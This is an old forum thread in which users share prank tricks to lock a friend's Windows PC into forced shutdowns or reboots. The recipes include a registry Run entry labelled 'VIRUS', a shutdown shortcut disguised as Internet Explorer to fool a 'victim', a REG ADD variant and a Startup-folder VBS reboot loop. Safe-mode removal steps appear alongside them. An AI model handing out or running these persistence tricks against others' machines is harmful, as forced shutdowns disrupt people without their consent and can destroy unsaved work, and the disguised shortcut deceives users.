Shutdown PC when every time its starts

Discussion in 'Windows' started by NDL, Dec 21, 2008.

  1. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    Disclaimer : This is for education purpose only if something like this happens to you.

    How to do it



    Shutdown your friend's pc when every time its restarts. Add the following registry key and that should do the job for you.

    Code:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ha..??\" -f"
    
    DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to
    Code:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    and remove the string value named VIRUS, restart you computer.
     
  2. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    can't we remove that from startup. Will it give time to establish the explorer or it'll shutdown instantly. Wat happens is safe mode?
     
  3. Bhullarz

    Bhullarz New Member

    Joined:
    Nov 15, 2006
    Messages:
    253
    Likes Received:
    13
    Trophy Points:
    0
    Occupation:
    System Manager
    Home Page:
    http://www.tutors161.com
    Nice Trick NDL ! I used the same thing but in different manner a long time ago.
    Let me just share it with you all.

    Just right click on desktop. Select "new" from menu and then select "shortcut". Now instead of browsing the file, just type the following code :
    Code:
    shutdown -t 1 -f
    Now click on "next" and then name the file as "Internet Explorer" or whatever you want. And then click on "Finish". A new shortcut is created on the desktop. Now right click on the shortcut and select "properties" from the menu. You will find a button "Change icon". Now click on it and choose the icon whichever you want. If you have named the icon as "Internet Explorer" , just choose the icon of Internet Explorer. Now its ready to work. Whenever Anyone would try to start the Internet Explorer using this icon , the pc will be shutdown or will logoff ( in case of if you are using good anti virus). Before logging off / Shutdown, it will close all the opened applications.
    I have tested this trick with only Windows XP SP2 only. It won't harm your pc anyway but can tease the victim.

    For neo_vi, whenever you are starting up in safe mode, system will load only the basic drivers required to work the system properly. No other user-defined start ups or application controlled start ups will be loaded. So, you can start your system in safe mode and can remove the registry entry.
     
  4. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    when u start with safe mode it only load basics
     
  5. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    nice one :D
     
  6. happyz

    happyz New Member

    Joined:
    Nov 18, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    this isn't working as it is posted..... it is logging off the system rather than shutting down
    I just tried it now
     
  7. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    ya. i too tried. it only logs off the system.
    try this
    Code:
    shutdown -s
    or
    shutdown -r
    
    It will work fine.
     
  8. happyz

    happyz New Member

    Joined:
    Nov 18, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    yes this will work now

    shutdown -s will only shutdown now and shutdown -r will restart
     
  9. happyz

    happyz New Member

    Joined:
    Nov 18, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    and one more thing i think you should also edit your post now either edit the quoted code or the title of the post
     
  10. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    i dont have a edit option :(
     
  11. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Articles once submitted cannot be edited and PM me the new content if you would like to update it.

    Let me know the exact changes.
     
  12. Dak914

    Dak914 Member

    Joined:
    May 3, 2008
    Messages:
    48
    Likes Received:
    5
    Trophy Points:
    8
    Code:
    REG ADD \\HKEY_LOCAL_MACHIN\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SHUTDOWN /d "SHUTDOWN /s"
    
    I think that should do it. I will test it out on my XP partition to see how it goes.

    EDIT: Never mind. I had vista and xp mixed up.
     
    Last edited: Dec 24, 2008
  13. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    send :)
     
  14. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Just letting me know the changes as well.
     
  15. sun_kangane

    sun_kangane New Member

    Joined:
    Mar 20, 2007
    Messages:
    33
    Likes Received:
    0
    Trophy Points:
    0
    one another way to put PC in Restart cycle :

    Code:
    Set WSHShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "C:\WINDOWS\system32\shutdown.exe -r -t 0"
    wscript.quit()
    
    just copy paste above code in notepad and save file as C:\Documents and Settings\All Users\Start Menu\Programs\Startup\reboot.vbs

    this will put ur pc in reboot cycle..........
     
  16. sun_kangane

    sun_kangane New Member

    Joined:
    Mar 20, 2007
    Messages:
    33
    Likes Received:
    0
    Trophy Points:
    0
    ????? what to do???????:crazy:
     
  17. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    sorry mate. i haven't seen the second page of the thread. I removed my post..
     
  18. NDL

    NDL New Member

    Joined:
    Oct 20, 2008
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    SL,colombo
    Home Page:
    http://www.nisal.co.nr
    nice tnx
     
  19. pradeep

    pradeep Team Leader

    Joined:
    Apr 4, 2005
    Messages:
    1,645
    Likes Received:
    87
    Trophy Points:
    0
    Occupation:
    Programmer
    Location:
    Kolkata, India
    Home Page:
    http://blog.pradeep.net.in
  20. Alex1239

    Alex1239 New Member

    Joined:
    Jan 5, 2009
    Messages:
    25
    Likes Received:
    20
    Trophy Points:
    0
    Occupation:
    Student
    Home Page:
    http://techotips.com
    nice work dude (leaving the part to be edited)...
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice